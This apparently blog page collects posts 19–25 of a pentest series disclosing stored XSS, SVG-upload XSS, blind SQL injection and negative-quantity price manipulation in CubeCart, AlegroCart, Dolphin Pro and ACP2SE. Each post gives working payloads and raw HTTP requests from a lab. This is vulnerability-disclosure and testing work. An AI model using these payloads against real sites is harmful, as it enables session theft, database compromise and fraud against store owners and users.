Saturday, 24 May 2025

Friday Fun Pentest Series - 25 - Stored Cross Site Scripting (XSS) - cubecartv6.5.9

Description

- It was noted that the application was vulnerable to Stored Cross Site Scripting


Stored Cross Site Scripting #1:

Steps to Reproduce:

  1. Visit "Account" > "Address Book" and choose "Edit"
  2. In the "Description" parameter enter the following payload <iframe><textarea></iframe><img src="" onerror="alert(document.domain)">

// HTTP POST Request

POST /cubecart/index.php?_a=addressbook&action=edit&address_id=1 HTTP/1.1
Host: 192.168.58.186
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
[...]

------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6
Content-Disposition: form-data; name="description"

<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">
------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6
Content-Disposition: form-data; name="title"
[...] 


// HTTP Response

HTTP/1.1 302 Found
Date: Sun, 18 May 2025 12:16:17 GMT
Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12 Perl/v5.34.1
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.2.4
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]


// HTTP GET Request

GET /cubecart/index.php?_a=addressbook HTTP/1.1
Host: 192.168.58.186
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
[...]



// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 18 May 2025 12:16:41 GMT
Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12 Perl/v5.34.1
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.2.4
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: CC_1349B74620=k6fd07i7h211fg1d69p5mvkuru;Expires=Monday, 19-May-2025 12:16:41 UTC;Domain=.192.168.58.186;Path=/cubecart;HttpOnly
Vary: Accept-Encoding
Content-Length: 42139
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[...]
<div class="small-12 columns"><h5><a href="?_a=addressbook&action=edit&address_id=1"><iframe><textarea></iframe><img src="" onerror="alert(document.domain)"></a></h5></div>
[...]

at No comments:

Wednesday, 30 April 2025

Friday Fun Pentest Series - 24 - Business Logic Flaw: Price Manipulation - alegrocartv1.2.9

Description

- The "quantity" parameter was vulnerable to business logic flaw, that affected the end price result


Business Logic Flaw: Price Manipulation #1:

Steps to Reproduce:

  1. Visit the store and add a product
  2. Intercept the HTTP GET request and add negative value to the "quantity" parameter

// HTTP GET request

GET /alegrocart/index.php?controller=addtocart&action=add&item=10&quantity=-100 HTTP/1.1
Host: 192.168.58.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
[...]


// HTTP response

HTTP/1.1 200 OK
Date: Thu, 03 Apr 2025 22:16:58 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Cache-Control: max-age=0, private, no-store, no-cache, must-revalidate
Expires: Thu, 03 Apr 2025 22:16:58 GMT
Vary: Accept-Encoding
Content-Length: 813
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div class="headingcolumn pointer" onclick="ShowCart()"><h3>Cart  ^</h3></div>
<div  class="cart">
<div id="cart_content" class="cart_content">
<div id="cart_products">
<table>
<tr>
<td>-100&nbsp;x&nbsp;</td>
<td class="ff"><a href="http://192.168.58.129/alegrocart/?controller=product&amp;product_id=10">Featured13/8&quot;&amp;1/2&quot;</a></td>
<td class="ee"> $-1,599.00</td>
</tr>
</table>
</div>
<div class="aa">Subtotal:$-1,599.00</div>
<div class="cc">1 Product(s) - <div class="dd">-100 Item(s)</div></div>
<div class="bb" id="cart_button"><a href="http://192.168.58.129/alegrocart/?controller=cart">View Cart</a></div>
[...]



at No comments:

Friday Fun Pentest Series - 23 - Stored XSS - alegrocartv1.2.9

Description

- The application lacked output encoding and as a  result of that was vulnerable to Stored XSS


Stored XSS #1:

Steps to Reproduce:

  1. Login as demonstrator account and visit "Customers" > "Newsletter"
  2. In "Message" use the following XSS payload

<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>

at No comments:

Friday Fun Pentest Series - 22 - XSS via SVG Image Upload - alegrocartv1.2.9

Description

-  It was noted that the image upload functionality was vulnerable to XSS by uploading a specially crafted SVG image


XSS via SVG Image Upload

Steps to Reproduce:

  1. Visit http://192.168.58.129/alegrocart/administrator/?controller=download
  2. Upload SVG image file with the contents below
  3. Intercept the POST request and change the Content-Type to "Content-Type: image/jpg"
  4. Then visit "http://192.168.58.129/alegrocart/download/xss.svg" to trigger the XSS

<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
    <foreignObject width="100%" height="100%">
        <body xmlns="http://www.w3.org/1999/xhtml">
            <input type="text" onkeyup="prompt('XSS Triggered!')" placeholder="Type here..."/>
        </body>
    </foreignObject>
</svg>


at No comments:

Friday, 21 March 2025

Friday Fun Pentest Series - 21 - SQL Injection in Admin Functionality - dolphin.prov7.4.2

Description

- It was noted that the admin functionality was vulnerable to Blind SQL injection


SQL Injection in Admin Functionality

Steps to Reproduce:

  1. Login as admin user and visit the page of "http://192.168.58.170/dolphinCMS/administration/index.php?cat="
  2. Add the MySQL injection SLEEP payload to the "cat" value
  3. Notice that the backend would delay the HTTP response for 14 miliseconds  

%27%20and%20(select*from(select(sleep(14)))a)--%20


// HTTP GET Request

GET /dolphinCMS/administration/index.php?cat=%27%20and%20(select*from(select(sleep(14)))a)--%20 HTTP/1.1
Host: 192.168.58.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Thu, 20 Mar 2025 22:55:46 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 55510



at No comments:

Friday Fun Pentest Series - 20 - Stored XSS in Messaging Functionality - dolphin.prov7.4.2

Description

- It was identified that the "Send Message" functionality was vulnerable to Stored Cross-Site Scripting, opening the doors for potential account takeovers and more advanced attack scenarios


Stored XSS in Messaging Functionality

Steps to Reproduce:

  1. Login and visit "http://192.168.58.170/dolphinCMS/mail.php?mode=compose"
  2. Add "Recipient" and "Subject" with random words
  3. Add the below mentioned XSS payload that would bypass the XSS filter in the message section
  4. Intercept the HTTP POST request and add the payload once again, as it might get filtered (make sure to URL encode the spaces etc)
  5. It would trigger once the message has been seen
<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>


// HTTP POST request

POST /dolphinCMS/mail.php?ajax_mode=true&action=compose_mail&recipient_id=1 HTTP/1.1
Host: 192.168.58.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
[...]

subject=test&message=<iframe+srcdoc%3d"<img+src%3dx+onerror%3dalert(document.domain)>"></iframe>


// HTTP Response

HTTP/1.1 200 OK
Date: Fri, 21 Mar 2025 17:41:52 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 455
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<div class="MsgBox" id="1742578912167">
<table class="MsgBox bx-def-margin-top bx-def-margin-bottom"><tr><td>
<div class="msgbox_content bx-def-font-large bx-def-padding-sec">
Message has been successfully sent. <a href="http://192.168.58.170/dolphinCMS/mail.php?mode=compose">Send</a> another message or <a href="http://192.168.58.170/dolphinCMS/admin">view</a> admin's profile.        </div>
</td></tr></table>
</div>







at No comments:

Wednesday, 19 February 2025

Friday Fun Pentest Series - 19 - Self Stored XSS - acp2sev7.2.2

Description

- It was found that the application had problems around sanitizing and output encoding correctly, leading to Self Stored XSS.


Self Stored XSS #1

Steps to Reproduce:
  1. Visit "http://192.168.58.168/acp2se/mul/muladmin.php" and login with "admin" / "adminpass"
  2. In the field "Put the name of the new Admin" enter the following payload "><svg onload=prompt(document.cookie)>

// HTTP POST request

POST /acp2se/mul/muladmin.php HTTP/1.1
Host: 192.168.58.168
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
[...]

name="><svg onload=prompt(document.cookie)>&submit=Submit


// HTTP Response

HTTP/1.1 200 OK
Date: Wed, 19 Feb 2025 08:22:26 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1210
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[...]
<table border='1' cellpadding='2' cellspacing='2' width='850'>
<tr bgcolor='#C0C0C0'>
 <th width='850'>You have added a default Admin. His name is: "><svg onload=prompt(document.cookie)> .</br> The default password will be: <b>Admin</b>
[...]

















at No comments:
Subscribe to: Posts (Atom)

Friday Fun Pentest Series - 25 - Stored Cross Site Scripting (XSS) - cubecartv6.5.9

Description - It was noted that the application was vulnerable to Stored Cross Site Scripting Stored Cross Site Scripting #1: Steps to Repro...